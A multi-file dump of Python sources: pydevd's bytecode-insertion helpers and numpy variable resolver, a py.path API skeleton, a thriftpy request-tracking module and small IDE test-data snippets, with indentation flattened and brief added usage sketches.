for (inserted_offset, inserted_code) in all_inserted_code:
if prev_abs_offset <= inserted_offset < abs_offset:
size_of_inserted = len(inserted_code)
new_list[i] += size_of_inserted
abs_offset += size_of_inserted
if new_list[i] > MAX_BYTE:
new_list[i] = new_list[i] - MAX_BYTE
new_list = new_list[:i] + [MAX_BYTE, 0] + new_list[i:]
i += 2
return bytes(new_list)
def _unpack_opargs(code, inserted_code_list, current_index):
"""
Modified version of `_unpack_opargs` function from module `dis`.
    We have to use it because sometimes the code can be in an inconsistent state: an EXTENDED_ARG
    operator may have been introduced into the code, but it hasn't been inserted into `code_list` yet.
In this case we can't use standard `_unpack_opargs` and we should check whether there are
some new operators in `inserted_code_list`.
"""
extended_arg = 0
for i in range(0, len(code), 2):
op = code[i]
if op >= HAVE_ARGUMENT:
if not extended_arg:
# in case if we added EXTENDED_ARG, but haven't inserted it to the source code yet.
for code_index in range(current_index, len(inserted_code_list)):
inserted_offset, inserted_code = inserted_code_list[code_index]
if inserted_offset == i and inserted_code[0] == EXTENDED_ARG:
extended_arg = inserted_code[1] << 8
arg = code[i+1] | extended_arg
extended_arg = (arg << 8) if op == EXTENDED_ARG else 0
else:
arg = None
yield (i, op, arg)
def _update_label_offsets(code_obj, breakpoint_offset, breakpoint_code_list):
"""
Update labels for the relative and absolute jump targets
:param code_obj: code to modify
:param breakpoint_offset: offset for the inserted code
    :param breakpoint_code_list: list of code instructions to insert
:return: bytes sequence with modified labels; list of tuples (resulting offset, list of code instructions) with
information about all inserted pieces of code
"""
inserted_code = list()
# the list with all inserted pieces of code
inserted_code.append((breakpoint_offset, breakpoint_code_list))
code_list = list(code_obj)
j = 0
while j < len(inserted_code):
current_offset, current_code_list = inserted_code[j]
offsets_for_modification = []
for offset, op, arg in _unpack_opargs(code_list, inserted_code, j):
if arg is not None:
if op in dis.hasjrel:
# has relative jump target
label = offset + 2 + arg
if offset < current_offset < label:
# change labels for relative jump targets if code was inserted inside
offsets_for_modification.append(offset)
elif op in dis.hasjabs:
# change label for absolute jump if code was inserted before it
if current_offset < arg:
offsets_for_modification.append(offset)
for i in range(0, len(code_list), 2):
op = code_list[i]
if i in offsets_for_modification and op >= dis.HAVE_ARGUMENT:
new_arg = code_list[i + 1] + len(current_code_list)
if new_arg <= MAX_BYTE:
code_list[i + 1] = new_arg
else:
# handle bytes overflow
if i - 2 > 0 and code_list[i - 2] == EXTENDED_ARG and code_list[i - 1] < MAX_BYTE:
                        # if the new argument > 255 and an EXTENDED_ARG already exists, we need to increase its argument
code_list[i - 1] += 1
else:
# if there isn't EXTENDED_ARG operator yet we have to insert the new operator
extended_arg_code = [EXTENDED_ARG, new_arg >> 8]
inserted_code.append((i, extended_arg_code))
code_list[i + 1] = new_arg & MAX_BYTE
code_list = code_list[:current_offset] + current_code_list + code_list[current_offset:]
for k in range(len(inserted_code)):
offset, inserted_code_list = inserted_code[k]
if current_offset < offset:
inserted_code[k] = (offset + len(current_code_list), inserted_code_list)
j += 1
return bytes(code_list), inserted_code
def _return_none_fun():
return None
def add_jump_instruction(jump_arg, code_to_insert):
"""
    Add the additional instruction POP_JUMP_IF_TRUE to implement a proper jump for the "set next statement" action.
    The jump should target the beginning of the inserted fragment
:param jump_arg: argument for jump instruction
:param code_to_insert: code to insert
:return: a code to insert with properly added jump instruction
"""
extended_arg_list = []
if jump_arg > MAX_BYTE:
extended_arg_list += [EXTENDED_ARG, jump_arg >> 8]
jump_arg = jump_arg & MAX_BYTE
# remove 'RETURN_VALUE' instruction and add 'POP_JUMP_IF_TRUE' with (if needed) 'EXTENDED_ARG'
return list(code_to_insert.co_code[:-RETURN_VALUE_SIZE]) + extended_arg_list + [opmap['POP_JUMP_IF_TRUE'], jump_arg]
def insert_code(code_to_modify, code_to_insert, before_line):
"""
    Insert the piece of code `code_to_insert` into `code_to_modify` right before the first instruction of
    the line `before_line` by modifying the original bytecode
:param code_to_modify: Code to modify
:param code_to_insert: Code to insert
:param before_line: Number of line for code insertion
:return: boolean flag whether insertion was successful, modified code
"""
linestarts = dict(dis.findlinestarts(code_to_modify))
if before_line not in linestarts.values():
        return False, code_to_modify
offset = None
for off, line_no in linestarts.items():
if line_no == before_line:
offset = off
code_to_insert_list = add_jump_instruction(offset, code_to_insert)
try:
code_to_insert_list, new_names = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_names',
dis.hasname)
code_to_insert_list, new_consts = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_consts',
[opmap['LOAD_CONST']])
code_to_insert_list, new_vars = \
_add_attr_values_from_insert_to_original(code_to_modify, code_to_insert, code_to_insert_list, 'co_varnames',
dis.haslocal)
new_bytes, all_inserted_code = _update_label_offsets(code_to_modify.co_code, offset, list(code_to_insert_list))
new_lnotab = _modify_new_lines(code_to_modify, all_inserted_code)
except ValueError:
traceback.print_exc()
return False, code_to_modify
new_code = CodeType(
code_to_modify.co_argcount, # integer
code_to_modify.co_kwonlyargcount, # integer
len(new_vars), # integer
code_to_modify.co_stacksize, # integer
code_to_modify.co_flags, # integer
new_bytes, # bytes
new_consts, # tuple
new_names, # tuple
new_vars, # tuple
code_to_modify.co_filename, # string
code_to_modify.co_name, # string
code_to_modify.co_firstlineno, # integer
new_lnotab, # bytes
code_to_modify.co_freevars, # tuple
code_to_modify.co_cellvars # tuple
)
return True, new_code
```
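Taken together, these helpers splice extra instructions into an existing code object before a given line: arguments are remapped against the enlarged `co_names`/`co_consts`/`co_varnames`, jump targets and `co_lnotab` are shifted, and a `POP_JUMP_IF_TRUE` back to the original offset replaces the snippet's `RETURN_VALUE`. The sketch below only illustrates the entry point and is not part of the original sources; it assumes CPython 3.6/3.7 (the module relies on 2-byte wordcode and the pre-3.8 `CodeType` constructor signature), and the function and snippet names are made up.
```python
# A minimal sketch (assumptions: CPython 3.6/3.7, hypothetical names, and the
# pydevd sources on sys.path; not part of the original sources).
import dis
from _pydevd_frame_eval.pydevd_modify_bytecode import insert_code

def target(a):
    b = a + 1      # the line we want to patch in front of
    return b

snippet = compile("print('injected')", "<snippet>", "exec")
line = target.__code__.co_firstlineno + 1
ok, patched = insert_code(target.__code__, snippet, line)
print(ok)
if ok:
    dis.dis(patched)   # the injected instructions now precede the original line
```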
#### File: extensions/types/pydevd_plugin_numpy_types.py
```python
from _pydevd_bundle.pydevd_constants import IS_PYCHARM
from _pydevd_bundle.pydevd_extension_api import TypeResolveProvider, StrPresentationProvider
from _pydevd_bundle.pydevd_resolver import defaultResolver, MAX_ITEMS_TO_HANDLE, TOO_LARGE_ATTR, TOO_LARGE_MSG
from _pydevd_bundle.pydevd_utils import get_var_and_offset
from .pydevd_helpers import find_mod_attr
try:
from collections import OrderedDict
except:
OrderedDict = dict
DEFAULT_PRECISION = 5
# =======================================================================================================================
# NdArrayResolver
# =======================================================================================================================
class NdArrayResolver: pass
class NdArrayItemsContainer: pass
class NDArrayTypeResolveProvider(object):
def can_provide(self, type_object, type_name):
nd_array = find_mod_attr('numpy', 'ndarray')
return nd_array is not None and issubclass(type_object, nd_array)
'''
This resolves a numpy ndarray returning some metadata about the NDArray
'''
def is_numeric(self, obj):
if not hasattr(obj, 'dtype'):
return False
return obj.dtype.kind in 'biufc'
def round_if_possible(self, obj):
try:
return obj.round(DEFAULT_PRECISION)
except TypeError:
return obj
def resolve(self, obj, attribute):
if attribute == '__internals__':
if not IS_PYCHARM:
return defaultResolver.get_dictionary(obj)
if attribute == 'min':
if self.is_numeric(obj):
return obj.min()
else:
return None
if attribute == 'max':
if self.is_numeric(obj):
return obj.max()
else:
return None
if attribute == 'shape':
return obj.shape
if attribute == 'dtype':
return obj.dtype
if attribute == 'size':
return obj.size
if attribute.startswith('['):
container = NdArrayItemsContainer()
i = 0
format_str = '%0' + str(int(len(str(len(obj))))) + 'd'
for item in obj:
setattr(container, format_str % i, item)
i += 1
if i > MAX_ITEMS_TO_HANDLE:
setattr(container, TOO_LARGE_ATTR, TOO_LARGE_MSG)
break
return container
if IS_PYCHARM and attribute == 'array':
container = NdArrayItemsContainer()
container.items = obj
return container
return None
def get_dictionary(self, obj):
ret = dict()
if not IS_PYCHARM:
ret['__internals__'] = defaultResolver.get_dictionary(obj)
if obj.size > 1024 * 1024:
ret['min'] = 'ndarray too big, calculating min would slow down debugging'
ret['max'] = 'ndarray too big, calculating max would slow down debugging'
else:
if self.is_numeric(obj):
ret['min'] = obj.min()
ret['max'] = obj.max()
else:
ret['min'] = 'not a numeric object'
ret['max'] = 'not a numeric object'
ret['shape'] = obj.shape
ret['dtype'] = obj.dtype
ret['size'] = obj.size
if IS_PYCHARM:
ret['array'] = NdArrayItemsContainer()
else:
ret['[0:%s] ' % (len(obj))] = list(obj[0:MAX_ITEMS_TO_HANDLE])
return ret
class NDArrayStrProvider(object):
def can_provide(self, type_object, type_name):
nd_array = find_mod_attr('numpy', 'ndarray')
return nd_array is not None and issubclass(type_object, nd_array)
def get_str(self, val):
return str(val[:MAX_ITEMS_TO_HANDLE])
class NdArrayItemsContainerProvider(object):
def can_provide(self, type_object, type_name):
return issubclass(type_object, NdArrayItemsContainer)
def resolve(self, obj, attribute):
if attribute == '__len__':
return None
return obj.items[int(attribute)]
def get_dictionary(self, obj):
obj, offset = get_var_and_offset(obj)
l = len(obj.items)
d = OrderedDict()
format_str = '%0' + str(int(len(str(l)))) + 'd'
i = offset
for item in obj.items[offset:offset + MAX_ITEMS_TO_HANDLE]:
d[format_str % i] = item
i += 1
if i > MAX_ITEMS_TO_HANDLE + offset:
break
d['__len__'] = l
return d
import sys
if not sys.platform.startswith("java"):
TypeResolveProvider.register(NDArrayTypeResolveProvider)
if IS_PYCHARM:
TypeResolveProvider.register(NdArrayItemsContainerProvider)
StrPresentationProvider.register(NDArrayStrProvider)
```
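The resolver above is what the debugger consults when it displays an `ndarray`: it always reports `shape`, `dtype` and `size`, and it computes `min`/`max` only for numeric arrays with at most 1024 * 1024 elements. A small illustration of that dictionary outside of any debugger (not part of the original sources; it requires numpy and assumes the provider class defined above is in scope):
```python
# A minimal sketch (assumptions: numpy is installed and NDArrayTypeResolveProvider
# from the file above is in scope; not part of the original sources).
import numpy as np

provider = NDArrayTypeResolveProvider()
arr = np.arange(6).reshape(2, 3)
print(provider.can_provide(type(arr), 'ndarray'))   # True
meta = provider.get_dictionary(arr)
print(meta['shape'], meta['size'])                  # (2, 3) 6
print(meta['min'], meta['max'])                     # 0 5, computed because size <= 1024 * 1024
```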
#### File: pydev/tests_pydevd_python/_bytecode_overflow_example.py
```python
import re
en_lang_symbols = r'[^\w!@#$%\^-_+=|\}{][\"\';:?\/><.,&)(*\s`\u2019]'
en_words_basic = []
en_words = []
TRACE_MESSAGE = "Trace called"
def tracing():
print(TRACE_MESSAGE)
def call_tracing():
tracing()
class Dummy:
non_en_words_limit = 3
@staticmethod
def fun(text):
words = tuple(w[0].lower() for w in re.finditer(r'[a-zA-Z]+', text))
non_en_pass = []
for i, word in enumerate(words):
non_en = []
if not (word in en_words_basic
or (word.endswith('s') and word[:-1] in en_words_basic)
or (word.endswith('ed') and word[:-2] in en_words_basic)
or (word.endswith('ing') and word[:-3] in en_words_basic)
or word in en_words
or (word.endswith('s') and word[:-1] in en_words)
or (word.endswith('ed') and word[:-2] in en_words)
or (word.endswith('ing') and word[:-3] in en_words)
):
non_en.append(word)
non_en_pass.append(word)
for j in range(1, Dummy.non_en_words_limit):
if i + j >= len(words):
break
word = words[i + j]
if (word in en_words_basic
or (word.endswith('s') and word[:-1] in en_words_basic)
or (word.endswith('ed') and word[:-2] in en_words_basic)
or (word.endswith('ing') and word[:-3] in en_words_basic)
or word in en_words
or (word.endswith('s') and word[:-1] in en_words)
or (word.endswith('ed') and word[:-2] in en_words)
or (word.endswith('ing') and word[:-3] in en_words)
):
break
else:
non_en.append(word)
non_en_pass.append(word)
class DummyTracing:
non_en_words_limit = 3
@staticmethod
def fun(text):
words = tuple(w[0].lower() for w in re.finditer(r'[a-zA-Z]+', text))
tracing()
non_en_pass = []
for i, word in enumerate(words):
non_en = []
if not (word in en_words_basic
or (word.endswith('s') and word[:-1] in en_words_basic)
or (word.endswith('ed') and word[:-2] in en_words_basic)
or (word.endswith('ing') and word[:-3] in en_words_basic)
or word in en_words
or (word.endswith('s') and word[:-1] in en_words)
or (word.endswith('ed') and word[:-2] in en_words)
or (word.endswith('ing') and word[:-3] in en_words)
):
non_en.append(word)
non_en_pass.append(word)
for j in range(1, Dummy.non_en_words_limit):
if i + j >= len(words):
break
word = words[i + j]
if (word in en_words_basic
or (word.endswith('s') and word[:-1] in en_words_basic)
or (word.endswith('ed') and word[:-2] in en_words_basic)
or (word.endswith('ing') and word[:-3] in en_words_basic)
or word in en_words
or (word.endswith('s') and word[:-1] in en_words)
or (word.endswith('ed') and word[:-2] in en_words)
or (word.endswith('ing') and word[:-3] in en_words)
):
break
else:
non_en.append(word)
non_en_pass.append(word)
```
#### File: py/path/__init__.py
```python
class NeverRaised(Exception):
pass
class PathBase(object):
""" shared implementation for filesystem path objects."""
def basename(self):
""" basename part of path. """
def dirname(self):
""" dirname part of path. """
def purebasename(self):
""" pure base name of the path."""
def ext(self):
""" extension of the path (including the '.')."""
def dirpath(self, *args, **kwargs):
""" return the directory path joined with any given path arguments. """
def read_binary(self):
""" read and return a bytestring from reading the path. """
def read_text(self, encoding):
""" read and return a Unicode string from reading the path. """
def read(self, mode='r'):
""" read and return a bytestring from reading the path. """
def readlines(self, cr=1):
""" read and return a list of lines from the path. if cr is False, the
newline will be removed from the end of each line. """
def load(self):
""" (deprecated) return object unpickled from self.read() """
def move(self, target):
""" move this path to target. """
def __repr__(self):
""" return a string representation of this path. """
def check(self, **kw):
""" check a path for existence and properties.
Without arguments, return True if the path exists, otherwise False.
valid checkers::
file=1 # is a file
file=0 # is not a file (may not even exist)
dir=1 # is a dir
link=1 # is a link
exists=1 # exists
You can specify multiple checker definitions, for example::
path.check(file=1, link=1) # a link pointing to a file
"""
def fnmatch(self, pattern):
"""return true if the basename/fullname matches the glob-'pattern'.
valid pattern characters::
* matches everything
? matches any single character
[seq] matches any character in seq
[!seq] matches any char not in seq
If the pattern contains a path-separator then the full path
is used for pattern matching and a '*' is prepended to the
pattern.
if the pattern doesn't contain a path-separator the pattern
is only matched against the basename.
"""
def relto(self, relpath):
""" return a string which is the relative part of the path
to the given 'relpath'.
"""
def ensure_dir(self, *args):
""" ensure the path joined with args is a directory. """
def bestrelpath(self, dest):
""" return a string which is a relative path from self
(assumed to be a directory) to dest such that
        self.join(bestrelpath) == dest and if no such
        path can be determined, return dest.
"""
def exists(self):
""" check a path for existence """
def isdir(self):
""" check a directory for existence. """
def isfile(self):
""" check a file for existence. """
def parts(self, reverse=False):
""" return a root-first list of all ancestor directories
plus the path itself.
"""
def common(self, other):
""" return the common part shared with the other path
or None if there is no common part.
"""
def visit(self, fil=None, rec=None, ignore=NeverRaised, bf=False, sort=False):
""" yields all paths below the current one
fil is a filter (glob pattern or callable), if not matching the
path will not be yielded, defaulting to None (everything is
returned)
rec is a filter (glob pattern or callable) that controls whether
a node is descended, defaulting to None
        ignore is an Exception class that is ignored when calling dirlist()
on any of the paths (by default, all exceptions are reported)
bf if True will cause a breadthfirst search instead of the
default depthfirst. Default: False
sort if True will sort entries within each directory level.
"""
def samefile(self, other):
""" return True if other refers to the same stat object as self. """
# py.path.local
class PosixPath(PathBase):
def chown(self, user, group, rec=0):
""" change ownership to the given user and group.
user and group may be specified by a number or
by a name. if rec is True change ownership
recursively.
"""
def readlink(self):
""" return value of a symbolic link. """
def mklinkto(self, oldname):
""" posix style hard link to another name. """
def mksymlinkto(self, value, absolute=1):
""" create a symbolic link with the given value (pointing to another name). """
class LocalPath(PosixPath):
""" object oriented interface to os.path and other local filesystem
related information.
"""
class ImportMismatchError(ImportError):
""" raised on pyimport() if there is a mismatch of __file__'s"""
def __init__(self, path=None, expanduser=False):
""" Initialize and return a local Path instance.
Path can be relative to the current directory.
If path is None it defaults to the current working directory.
If expanduser is True, tilde-expansion is performed.
Note that Path instances always carry an absolute path.
Note also that passing in a local path object will simply return
the exact same path object. Use new() to get a new copy.
"""
def samefile(self, other):
""" return True if 'other' references the same file as 'self'.
"""
def remove(self, rec=1, ignore_errors=False):
""" remove a file or directory (or a directory tree if rec=1).
if ignore_errors is True, errors while removing directories will
be ignored.
"""
def computehash(self, hashtype="md5", chunksize=524288):
""" return hexdigest of hashvalue for this file. """
def new(self, **kw):
""" create a modified version of this path.
the following keyword arguments modify various path parts::
a:/some/path/to/a/file.ext
xx drive
xxxxxxxxxxxxxxxxx dirname
xxxxxxxx basename
xxxx purebasename
xxx ext
"""
def dirpath(self, *args, **kwargs):
""" return the directory path joined with any given path arguments. """
def join(self, *args, **kwargs):
""" return a new path by appending all 'args' as path
components. if abs=1 is used restart from root if any
of the args is an absolute path.
"""
def open(self, mode='r', ensure=False, encoding=None):
""" return an opened file with the given mode.
If ensure is True, create parent directories if needed.
"""
def islink(self):
pass
def check(self, **kw):
pass
def listdir(self, fil=None, sort=None):
""" list directory contents, possibly filter by the given fil func
and possibly sorted.
"""
def size(self):
""" return size of the underlying file object """
def mtime(self):
""" return last modification time of the path. """
def copy(self, target, mode=False, stat=False):
""" copy path to target.
        If mode is True, will copy permission from path to target.
If stat is True, copy permission, last modification
time, last access time, and flags from path to target.
"""
def rename(self, target):
""" rename this path to target. """
def dump(self, obj, bin=1):
""" pickle object into path location"""
def mkdir(self, *args):
""" create & return the directory joined with args. """
def write_binary(self, data, ensure=False):
""" write binary data into path. If ensure is True create
missing parent directories.
"""
def write_text(self, data, encoding, ensure=False):
""" write text data into path using the specified encoding.
If ensure is True create missing parent directories.
"""
def write(self, data, mode='w', ensure=False):
""" write data into path. If ensure is True create
missing parent directories.
"""
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). if you specify a keyword argument 'dir=True'
then the path is forced to be a directory path.
"""
def stat(self, raising=True):
""" Return an os.stat() tuple. """
def lstat(self):
""" Return an os.lstat() tuple. """
def setmtime(self, mtime=None):
""" set modification time for the given path. if 'mtime' is None
(the default) then the file's mtime is set to current time.
Note that the resolution for 'mtime' is platform dependent.
"""
def chdir(self):
""" change directory to self and return old current directory """
def realpath(self):
""" return a new path which contains no symbolic links."""
def atime(self):
""" return last access time of the path. """
def chmod(self, mode, rec=0):
""" change permissions to the given mode. If mode is an
integer it directly encodes the os-specific modes.
if rec is True perform recursively.
"""
def pypkgpath(self):
""" return the Python package path by looking for the last
directory upwards which still contains an __init__.py.
Return None if a pkgpath can not be determined.
"""
def pyimport(self, modname=None, ensuresyspath=True):
""" return path as an imported python module.
If modname is None, look for the containing package
and construct an according module name.
The module will be put/looked up in sys.modules.
if ensuresyspath is True then the root dir for importing
the file (taking __init__.py files into account) will
be prepended to sys.path if it isn't there already.
If ensuresyspath=="append" the root dir will be appended
if it isn't already contained in sys.path.
if ensuresyspath is False no modification of syspath happens.
"""
def sysexec(self, *argv, **popen_opts):
""" return stdout text from executing a system child process,
where the 'self' path points to executable.
The process is directly invoked and not through a system shell.
"""
def sysfind(cls, name, checker=None, paths=None):
""" return a path object found by looking at the systems
underlying PATH specification. If the checker is not None
it will be invoked to filter matching paths. If a binary
cannot be found, None is returned
Note: This is probably not working on plain win32 systems
but may work on cygwin.
"""
def get_temproot(cls):
""" return the system's temporary directory
(where tempfiles are usually created in)
"""
def mkdtemp(cls, rootdir=None):
""" return a Path object pointing to a fresh new temporary directory
(which we created ourself).
"""
def make_numbered_dir(cls, prefix='session-', rootdir=None, keep=3,
lock_timeout = 172800): # two days
""" return unique directory with a number greater than the current
maximum one. The number is assumed to start directly after prefix.
if keep is true directories with a number less than (maxnum-keep)
will be removed.
"""
local = LocalPath
# py.path.cacheutil
"""
This module contains multithread-safe cache implementations.
All Caches have
getorbuild(key, builder)
delentry(key)
methods and allow configuration when instantiating the cache class.
"""
class BasicCache(object):
""" BasicCache class.
"""
class BuildcostAccessCache(BasicCache):
""" A BuildTime/Access-counting cache implementation.
the weight of a value is computed as the product of
num-accesses-of-a-value * time-to-build-the-value
The values with the least such weights are evicted
    if the cache maxentries threshold is exceeded.
For implementation flexibility more than one object
might be evicted at a time.
"""
class AgingCache(BasicCache):
""" This cache prunes out cache entries that are too old.
"""
# py.path.svnwc
class SvnPathBase(PathBase):
""" Base implementation for SvnPath implementations. """
def new(self, **kw):
""" create a modified version of this path. A 'rev' argument
indicates a new revision.
the following keyword arguments modify various path parts::
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
def join(self, *args):
""" return a new Path (with the same revision) which is composed
of the self Path followed by 'args' path components.
"""
def propget(self, name):
""" return the content of the given property. """
def proplist(self):
""" list all property names. """
def size(self):
""" Return the size of the file content of the Path. """
def mtime(self):
""" Return the last modification time of the file. """
class SvnWCCommandPath(PathBase):
""" path implementation offering access/modification to svn working copies.
It has methods similar to the functions in os.path and similar to the
commands of the svn client.
"""
def dump(self, obj):
""" pickle object into path location"""
def svnurl(self):
""" return current SvnPath for this WC-item. """
def switch(self, url):
""" switch to given URL. """
def checkout(self, url=None, rev=None):
""" checkout from url to local wcpath. """
def update(self, rev='HEAD', interactive=True):
""" update working copy item to given revision. (None -> HEAD). """
def write(self, content, mode='w'):
""" write content into local filesystem wc. """
def dirpath(self, *args):
""" return the directory Path of the current Path. """
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). if you specify a keyword argument 'directory=True'
then the path is forced to be a directory path.
"""
def mkdir(self, *args):
""" create & return the directory joined with args. """
def add(self):
""" add ourself to svn """
def remove(self, rec=1, force=1):
""" remove a file or a directory tree. 'rec'ursive is
ignored and considered always true (because of
        underlying svn semantics).
"""
def copy(self, target):
""" copy path to target."""
def rename(self, target):
""" rename this path to target. """
def lock(self):
""" set a lock (exclusive) on the resource """
def unlock(self):
""" unset a previously set lock """
def cleanup(self):
""" remove any locks from the resource """
def status(self, updates=0, rec=0, externals=0):
""" return (collective) Status object for this file. """
def diff(self, rev=None):
""" return a diff of the current path against revision rev (defaulting
to the last one).
"""
def blame(self):
""" return a list of tuples of three elements:
        (revision, committer, line)
"""
def commit(self, msg='', rec=1):
""" commit with support for non-recursive commits """
def propset(self, name, value, *args):
""" set property name to value on this path. """
def propget(self, name):
""" get property name on this path. """
def propdel(self, name):
""" delete property name on this path. """
def proplist(self, rec=0):
""" return a mapping of property names to property values.
If rec is True, then return a dictionary mapping sub-paths to such mappings.
"""
def revert(self, rec=0):
""" revert the local changes of this path. if rec is True, do so
recursively. """
def new(self, **kw):
""" create a modified version of this path. A 'rev' argument
indicates a new revision.
the following keyword arguments modify various path parts:
http://host.com/repo/path/file.ext
|-----------------------| dirname
|------| basename
|--| purebasename
|--| ext
"""
def join(self, *args, **kwargs):
""" return a new Path (with the same revision) which is composed
of the self Path followed by 'args' path components.
"""
def info(self, usecache=1):
""" return an Info structure with svn-provided information. """
def listdir(self, fil=None, sort=None):
""" return a sequence of Paths.
listdir will return either a tuple or a list of paths
depending on implementation choices.
"""
def open(self, mode='r'):
""" return an opened file with the given mode. """
def log(self, rev_start=None, rev_end=1, verbose=False):
""" return a list of LogEntry instances for this path.
rev_start is the starting revision (defaulting to the first one).
rev_end is the last revision (defaulting to HEAD).
if verbose is True, then the LogEntry instances also know which files changed.
"""
class SvnAuth(object):
""" container for auth information for Subversion """
svnwc = SvnWCCommandPath
# py.path.svnurl
class SvnCommandPath(SvnPathBase):
""" path implementation that offers access to (possibly remote) subversion
repositories. """
def open(self, mode='r'):
""" return an opened file with the given mode. """
def dirpath(self, *args, **kwargs):
""" return the directory path of the current path joined
with any given path arguments.
"""
# modifying methods (cache must be invalidated)
def mkdir(self, *args, **kwargs):
""" create & return the directory joined with args.
pass a 'msg' keyword argument to set the commit message.
"""
def copy(self, target, msg='copied by py lib invocation'):
""" copy path to target with checkin message msg."""
def rename(self, target, msg="renamed by py lib invocation"):
""" rename this path to target with checkin message msg. """
def remove(self, rec=1, msg='removed by py lib invocation'):
""" remove a file or directory (or a directory tree if rec=1) with
checkin message msg."""
def export(self, topath):
""" export to a local path
topath should not exist prior to calling this, returns a
py.path.local instance
"""
def ensure(self, *args, **kwargs):
""" ensure that an args-joined path exists (by default as
a file). If you specify a keyword argument 'dir=True'
then the path is forced to be a directory path.
"""
# end of modifying methods
def info(self):
""" return an Info structure with svn-provided information. """
def listdir(self, fil=None, sort=None):
""" list directory contents, possibly filter by the given fil func
and possibly sorted.
"""
def log(self, rev_start=None, rev_end=1, verbose=False):
""" return a list of LogEntry instances for this path.
rev_start is the starting revision (defaulting to the first one).
rev_end is the last revision (defaulting to HEAD).
if verbose is True, then the LogEntry instances also know which files changed.
"""
svnurl = SvnCommandPath
```
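The skeleton above only documents the `py.path` API surface; the methods themselves are implemented in the real `py` package. A short usage sketch against that package (not part of the original sources):
```python
# A minimal sketch (assumption: the real `py` package is installed; not part of
# the original sources).
import py

tmp = py.path.local.mkdtemp()             # fresh temporary directory
f = tmp.join("notes.txt")
f.write_text(u"hello", encoding="utf-8")  # creates the file
print(f.read_text(encoding="utf-8"))      # hello
print(f.check(file=1), tmp.check(dir=1))  # True True
for p in tmp.visit(fil="*.txt"):
    print(p.relto(tmp))                   # notes.txt
tmp.remove(rec=1)                         # clean up the whole tree
```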
#### File: contrib/tracking/__init__.py
```python
from __future__ import absolute_import
import os.path
import time
from ...thrift import TClient, TApplicationException, TMessageType, \
TProcessor, TType
from ...parser import load
track_method = "__thriftpy_tracing_method_name__v2"
track_thrift = load(os.path.join(os.path.dirname(__file__), "tracking.thrift"))
__all__ = ["TTrackedClient", "TTrackedProcessor", "TrackerBase",
"ConsoleTracker"]
class RequestInfo(object):
def __init__(self, request_id, api, seq, client, server, status, start,
end, annotation, meta):
"""Used to store call info.
        :request_id: used to identify a request
:api: api name
:seq: sequence number
:client: client name
:server: server name
:status: request status
:start: start timestamp
:end: end timestamp
        :annotation: application-level key-value data
"""
self.request_id = request_id
self.api = api
self.seq = seq
self.client = client
self.server = server
self.status = status
self.start = start
self.end = end
self.annotation = annotation
self.meta = meta
class TTrackedClient(TClient):
def __init__(self, tracker_handler, *args, **kwargs):
super(TTrackedClient, self).__init__(*args, **kwargs)
self.tracker = tracker_handler
self._upgraded = False
try:
self._negotiation()
self._upgraded = True
except TApplicationException as e:
if e.type != TApplicationException.UNKNOWN_METHOD:
raise
def _negotiation(self):
self._oprot.write_message_begin(track_method, TMessageType.CALL,
self._seqid)
args = track_thrift.UpgradeArgs()
self.tracker.init_handshake_info(args)
args.write(self._oprot)
self._oprot.write_message_end()
self._oprot.trans.flush()
api, msg_type, seqid = self._iprot.read_message_begin()
if msg_type == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.read_message_end()
raise x
else:
result = track_thrift.UpgradeReply()
result.read(self._iprot)
self._iprot.read_message_end()
def _send(self, _api, **kwargs):
if self._upgraded:
self._header = track_thrift.RequestHeader()
self.tracker.gen_header(self._header)
self._header.write(self._oprot)
self.send_start = int(time.time() * 1000)
super(TTrackedClient, self)._send(_api, **kwargs)
def _req(self, _api, *args, **kwargs):
if not self._upgraded:
return super(TTrackedClient, self)._req(_api, *args, **kwargs)
exception = None
status = False
try:
res = super(TTrackedClient, self)._req(_api, *args, **kwargs)
status = True
return res
except BaseException as e:
exception = e
raise
finally:
header_info = RequestInfo(
request_id=self._header.request_id,
seq=self._header.seq,
client=self.tracker.client,
server=self.tracker.server,
api=_api,
status=status,
start=self.send_start,
end=int(time.time() * 1000),
annotation=self.tracker.annotation,
meta=self._header.meta,
)
self.tracker.record(header_info, exception)
class TTrackedProcessor(TProcessor):
def __init__(self, tracker_handler, *args, **kwargs):
super(TTrackedProcessor, self).__init__(*args, **kwargs)
self.tracker = tracker_handler
self._upgraded = False
def process(self, iprot, oprot):
if not self._upgraded:
res = self._try_upgrade(iprot)
else:
request_header = track_thrift.RequestHeader()
request_header.read(iprot)
self.tracker.handle(request_header)
res = super(TTrackedProcessor, self).process_in(iprot)
self._do_process(iprot, oprot, *res)
def _try_upgrade(self, iprot):
api, msg_type, seqid = iprot.read_message_begin()
if msg_type == TMessageType.CALL and api == track_method:
self._upgraded = True
args = track_thrift.UpgradeArgs()
args.read(iprot)
self.tracker.handle_handshake_info(args)
result = track_thrift.UpgradeReply()
result.oneway = False
def call():
pass
iprot.read_message_end()
else:
result, call = self._process_in(api, iprot)
return api, seqid, result, call
def _process_in(self, api, iprot):
if api not in self._service.thrift_services:
iprot.skip(TType.STRUCT)
iprot.read_message_end()
return TApplicationException(
TApplicationException.UNKNOWN_METHOD), None
args = getattr(self._service, api + "_args")()
args.read(iprot)
iprot.read_message_end()
result = getattr(self._service, api + "_result")()
# convert kwargs to args
api_args = [args.thrift_spec[k][1]
for k in sorted(args.thrift_spec)]
def call():
return getattr(self._handler, api)(
*(args.__dict__[k] for k in api_args)
)
return result, call
def _do_process(self, iprot, oprot, api, seqid, result, call):
if isinstance(result, TApplicationException):
return self.send_exception(oprot, api, result, seqid)
try:
result.success = call()
except Exception as e:
            # raise if the api doesn't declare throws
self.handle_exception(e, result)
if not result.oneway:
self.send_result(oprot, api, result, seqid)
from .tracker import TrackerBase, ConsoleTracker # noqa
```
#### File: testData/breadcrumbs/asyncSeveralWith.py
```python
async def foo():
async with open("file.txt"), open("file2.txt"):
print("a<caret>bc")
```
#### File: codeInsight/controlflow/trybreak.py
```python
def foo():
try:
for i in bar:
break
except:
raise Exception()
return 3
```
#### File: codeInsight/controlflow/typeannotations.py
```python
def foo(x: str) -> list:
expr = x
```
#### File: codeInsight/smartEnter/docTypeRType_after.py
```python
def foo(a):
"""
<caret>
@param a:
@type a:
@return:
